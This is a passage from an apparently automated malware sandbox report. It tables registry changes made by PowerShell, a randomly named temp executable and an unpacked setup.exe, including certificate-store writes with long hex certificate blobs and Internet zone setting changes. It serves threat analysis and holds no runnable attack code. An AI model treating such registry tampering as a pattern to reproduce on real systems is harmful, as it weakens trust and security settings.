| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "6" | C:\Users\Admin\AppData\Local\Temp\Bn9IWqvN\1YH22YflPi.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\iysZwBe.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e | C:\Users\Admin\AppData\Local\Temp\7zS8359791A\setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c00000001000000040000000010000004000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2